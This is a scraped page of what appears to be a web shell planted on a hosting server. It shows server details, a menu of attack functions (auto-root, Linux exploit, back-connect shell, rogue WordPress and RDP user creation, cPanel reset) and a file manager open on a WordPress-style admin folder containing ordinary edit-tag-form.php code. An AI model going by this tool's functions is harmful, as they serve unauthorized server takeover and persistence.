Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 18.118.226.167
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
sitepad /
editor /
site-admin /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
admin-ajax.php
4.32
KB
-rw-r--r--
admin-footer.php
2.3
KB
-rw-r--r--
admin-header.php
13.74
KB
-rw-r--r--
admin-post.php
1.66
KB
-rw-r--r--
admin.php
11.1
KB
-rw-r--r--
async-upload.php
3.63
KB
-rw-r--r--
comment.php
10.66
KB
-rw-r--r--
cookie-consent.php
17.06
KB
-rw-r--r--
custom-background.php
20.06
KB
-rw-r--r--
custom-header.php
46.28
KB
-rw-r--r--
customize.php
8.69
KB
-rw-r--r--
edit-form-advanced.php
30.63
KB
-rw-r--r--
edit-form-blocks.php
12.82
KB
-rw-r--r--
edit-form-comment.php
7.32
KB
-rw-r--r--
edit-tag-form.php
9.28
KB
-rw-r--r--
edit-tags.php
21.41
KB
-rw-r--r--
edit.php
21.76
KB
-rw-r--r--
export.php
10.69
KB
-rw-r--r--
features.php
3.22
KB
-rw-r--r--
google-analytics.php
2.79
KB
-rw-r--r--
import.php
7.28
KB
-rw-r--r--
index.php
12.53
KB
-rw-r--r--
load-scripts.php
1.62
KB
-rw-r--r--
load-styles.php
2.27
KB
-rw-r--r--
mailchimp.php
4.51
KB
-rw-r--r--
media-new.php
3.12
KB
-rw-r--r--
media-upload.php
3.3
KB
-rw-r--r--
media.php
5.54
KB
-rw-r--r--
menu-header.php
7.63
KB
-rw-r--r--
menu.php
9.82
KB
-rw-r--r--
nav-menus.php
38.34
KB
-rw-r--r--
options-discussion.php
14.83
KB
-rw-r--r--
options-general.php
15.83
KB
-rw-r--r--
options-head.php
492
B
-rw-r--r--
options-media.php
6.05
KB
-rw-r--r--
options-permalink.php
9.34
KB
-rw-r--r--
options-reading.php
9.05
KB
-rw-r--r--
options.php
11.6
KB
-rw-r--r--
plans.php
9.21
KB
-rw-r--r--
post-new.php
3.56
KB
-rw-r--r--
post.php
10.65
KB
-rw-r--r--
privacy.php
6.81
KB
-rw-r--r--
profile.php
298
B
-rw-r--r--
revision.php
5.06
KB
-rw-r--r--
seo.php
3.98
KB
-rw-r--r--
setup.php
22.96
KB
-rw-r--r--
sitemap.php
7.88
KB
-rw-r--r--
smtp-mail.php
12.7
KB
-rw-r--r--
term.php
2.07
KB
-rw-r--r--
themes.php
20.72
KB
-rw-r--r--
themes_setup.php
18.26
KB
-rw-r--r--
upload.php
13.46
KB
-rw-r--r--
user-edit.php
21.36
KB
-rw-r--r--
user-new.php
21.56
KB
-rw-r--r--
users.php
18.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit-tag-form.php
<?php /** * Edit tag form for inclusion in administration panels. * * @package WordPress * @subpackage Administration */ // don't load directly if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } // Back compat hooks if ( 'category' == $taxonomy ) { /** * Fires before the Edit Category form. * * @since 2.1.0 * @deprecated 3.0.0 Use {$taxonomy}_pre_edit_form instead. * * @param WP_Term $tag Current category term object. */ do_action( 'edit_category_form_pre', $tag ); } elseif ( 'link_category' == $taxonomy ) { /** * Fires before the Edit Link Category form. * * @since 2.3.0 * @deprecated 3.0.0 Use {$taxonomy}_pre_edit_form instead. * * @param WP_Term $tag Current link category term object. */ do_action( 'edit_link_category_form_pre', $tag ); } else { /** * Fires before the Edit Tag form. * * @since 2.5.0 * @deprecated 3.0.0 Use {$taxonomy}_pre_edit_form instead. * * @param WP_Term $tag Current tag term object. */ do_action( 'edit_tag_form_pre', $tag ); } /** * Use with caution, see https://sitepad.com/docs/Function_Reference/wp_reset_vars */ wp_reset_vars( array( 'wp_http_referer' ) ); $wp_http_referer = remove_query_arg( array( 'action', 'message', 'tag_ID' ), $wp_http_referer ); /** Also used by Edit Tags */ require_once( ABSPATH . 'site-admin/includes/edit-tag-messages.php' ); /** * Fires before the Edit Term form for all taxonomies. * * The dynamic portion of the hook name, `$taxonomy`, refers to * the taxonomy slug. * * @since 3.0.0 * * @param WP_Term $tag Current taxonomy term object. * @param string $taxonomy Current $taxonomy slug. */ do_action( "{$taxonomy}_pre_edit_form", $tag, $taxonomy ); ?> <div class="wrap"> <h1><?php echo $tax->labels->edit_item; ?></h1> <?php $class = ( isset( $msg ) && 5 === $msg ) ? 'error' : 'success'; if ( $message ) { ?> <div id="message" class="notice notice-<?php echo $class; ?>"> <p><strong><?php echo $message; ?></strong></p> <?php if ( $wp_http_referer ) { ?> <p><a href="<?php echo esc_url( wp_validate_redirect( esc_url_raw( $wp_http_referer ), admin_url( 'term.php?taxonomy=' . $taxonomy ) ) ); ?>"> <?php echo esc_html( $tax->labels->back_to_items ); ?> </a></p> <?php } ?> </div> <?php } ?> <div id="ajax-response"></div> <form name="edittag" id="edittag" method="post" action="edit-tags.php" class="validate" <?php /** * Fires inside the Edit Term form tag. * * The dynamic portion of the hook name, `$taxonomy`, refers to the taxonomy slug. * * @since 3.7.0 */ do_action( "{$taxonomy}_term_edit_form_tag" ); ?> > <input type="hidden" name="action" value="editedtag"/> <input type="hidden" name="tag_ID" value="<?php echo esc_attr( $tag_ID ); ?>"/> <input type="hidden" name="taxonomy" value="<?php echo esc_attr( $taxonomy ); ?>"/> <?php wp_original_referer_field( true, 'previous' ); wp_nonce_field( 'update-tag_' . $tag_ID ); /** * Fires at the beginning of the Edit Term form. * * At this point, the required hidden fields and nonces have already been output. * * The dynamic portion of the hook name, `$taxonomy`, refers to the taxonomy slug. * * @since 4.5.0 * * @param WP_Term $tag Current taxonomy term object. * @param string $taxonomy Current $taxonomy slug. */ do_action( "{$taxonomy}_term_edit_form_top", $tag, $taxonomy ); $tag_name_value = ''; if ( isset( $tag->name ) ) { $tag_name_value = esc_attr( $tag->name ); } ?> <table class="form-table"> <tr class="form-field form-required term-name-wrap"> <th scope="row"><label for="name"><?php _ex( 'Name', 'term name' ); ?></label></th> <td><input name="name" id="name" type="text" value="<?php echo $tag_name_value; ?>" size="40" aria-required="true" /> <p class="description"><?php _e( 'The name is how it appears on your site.' ); ?></p></td> </tr> <?php if ( ! global_terms_enabled() ) { ?> <tr class="form-field term-slug-wrap"> <th scope="row"><label for="slug"><?php _e( 'Slug' ); ?></label></th> <?php /** * Filters the editable slug. * * Note: This is a multi-use hook in that it is leveraged both for editable * post URIs and term slugs. * * @since 2.6.0 * @since 4.4.0 The `$tag` parameter was added. * * @param string $slug The editable slug. Will be either a term slug or post URI depending * upon the context in which it is evaluated. * @param WP_Term|WP_Post $tag Term or WP_Post object. */ $slug = isset( $tag->slug ) ? apply_filters( 'editable_slug', $tag->slug, $tag ) : ''; ?> <td><input name="slug" id="slug" type="text" value="<?php echo esc_attr( $slug ); ?>" size="40" /> <p class="description"><?php _e( 'The “slug” is the URL-friendly version of the name. It is usually all lowercase and contains only letters, numbers, and hyphens.' ); ?></p></td> </tr> <?php } ?> <?php if ( is_taxonomy_hierarchical( $taxonomy ) ) : ?> <tr class="form-field term-parent-wrap"> <th scope="row"><label for="parent"><?php echo esc_html( $tax->labels->parent_item ); ?></label></th> <td> <?php $dropdown_args = array( 'hide_empty' => 0, 'hide_if_empty' => false, 'taxonomy' => $taxonomy, 'name' => 'parent', 'orderby' => 'name', 'selected' => $tag->parent, 'exclude_tree' => $tag->term_id, 'hierarchical' => true, 'show_option_none' => __( 'None' ), ); /** This filter is documented in site-admin/edit-tags.php */ $dropdown_args = apply_filters( 'taxonomy_parent_dropdown_args', $dropdown_args, $taxonomy, 'edit' ); wp_dropdown_categories( $dropdown_args ); ?> <?php if ( 'category' == $taxonomy ) : ?> <p class="description"><?php _e( 'Categories, unlike tags, can have a hierarchy. You might have a Jazz category, and under that have children categories for Bebop and Big Band. Totally optional.' ); ?></p> <?php else : ?> <p class="description"><?php _e( 'Assign a parent term to create a hierarchy. The term Jazz, for example, would be the parent of Bebop and Big Band.' ); ?></p> <?php endif; ?> </td> </tr> <?php endif; // is_taxonomy_hierarchical() ?> <tr class="form-field term-description-wrap"> <th scope="row"><label for="description"><?php _e( 'Description' ); ?></label></th> <td><textarea name="description" id="description" rows="5" cols="50" class="large-text"><?php echo $tag->description; // textarea_escaped ?></textarea> <p class="description"><?php _e( 'The description is not prominent by default; however, some themes may show it.' ); ?></p></td> </tr> <?php // Back compat hooks if ( 'category' == $taxonomy ) { /** * Fires after the Edit Category form fields are displayed. * * @since 2.9.0 * @deprecated 3.0.0 Use {$taxonomy}_edit_form_fields instead. * * @param WP_Term $tag Current category term object. */ do_action( 'edit_category_form_fields', $tag ); } elseif ( 'link_category' == $taxonomy ) { /** * Fires after the Edit Link Category form fields are displayed. * * @since 2.9.0 * @deprecated 3.0.0 Use {$taxonomy}_edit_form_fields instead. * * @param WP_Term $tag Current link category term object. */ do_action( 'edit_link_category_form_fields', $tag ); } else { /** * Fires after the Edit Tag form fields are displayed. * * @since 2.9.0 * @deprecated 3.0.0 Use {$taxonomy}_edit_form_fields instead. * * @param WP_Term $tag Current tag term object. */ do_action( 'edit_tag_form_fields', $tag ); } /** * Fires after the Edit Term form fields are displayed. * * The dynamic portion of the hook name, `$taxonomy`, refers to * the taxonomy slug. * * @since 3.0.0 * * @param WP_Term $tag Current taxonomy term object. * @param string $taxonomy Current taxonomy slug. */ do_action( "{$taxonomy}_edit_form_fields", $tag, $taxonomy ); ?> </table> <?php // Back compat hooks if ( 'category' == $taxonomy ) { /** This action is documented in site-admin/edit-tags.php */ do_action( 'edit_category_form', $tag ); } elseif ( 'link_category' == $taxonomy ) { /** This action is documented in site-admin/edit-tags.php */ do_action( 'edit_link_category_form', $tag ); } else { /** * Fires at the end of the Edit Term form. * * @since 2.5.0 * @deprecated 3.0.0 Use {$taxonomy}_edit_form instead. * * @param WP_Term $tag Current taxonomy term object. */ do_action( 'edit_tag_form', $tag ); } /** * Fires at the end of the Edit Term form for all taxonomies. * * The dynamic portion of the hook name, `$taxonomy`, refers to the taxonomy slug. * * @since 3.0.0 * * @param WP_Term $tag Current taxonomy term object. * @param string $taxonomy Current taxonomy slug. */ do_action( "{$taxonomy}_edit_form", $tag, $taxonomy ); ?> <div class="edit-tag-actions"> <?php submit_button( __( 'Update' ), 'primary', null, false ); ?> <?php if ( current_user_can( 'delete_term', $tag->term_id ) ) : ?> <span id="delete-link"> <a class="delete" href="<?php echo admin_url( wp_nonce_url( "edit-tags.php?action=delete&taxonomy=$taxonomy&tag_ID=$tag->term_id", 'delete-tag_' . $tag->term_id ) ); ?>"><?php _e( 'Delete' ); ?></a> </span> <?php endif; ?> </div> </form> </div> <?php if ( ! wp_is_mobile() ) : ?> <script type="text/javascript"> try{document.forms.edittag.name.focus();}catch(e){} </script> <?php endif;
Close